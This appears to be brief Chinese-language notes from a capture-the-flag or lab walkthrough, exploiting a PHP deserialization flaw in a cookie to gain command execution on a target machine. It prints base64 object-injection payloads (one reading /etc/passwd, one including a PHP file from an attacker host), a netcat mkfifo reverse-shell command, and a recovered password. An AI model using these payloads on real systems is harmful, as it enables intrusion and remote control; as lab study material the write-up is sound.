1.扫描IP和目录
index.php界面查看网络-->图像-->cooike
进行base64位编码
O:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";O:7:"Welcome":0:{}}
2./backup发现是压缩包下载发现三个php
代码审计:发现有unserialize
可以构造payload
运行一下
Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ==
3.将/etc/passwd改成本机的txt文档
然后运行一下得出:
Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6Mjc6Imh0dHA6Ly8xOTIuMTY4LjMuMTU1LzExLnBocCI7fX0=
将Cookie替换
?cmd=id发现显示
4.反弹shell
kali开启监听,反弹shell
将id替换为:
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.238.132+7777+>/tmp/f
进入靶机
得到密码:KywZmnPWW6tTbW5w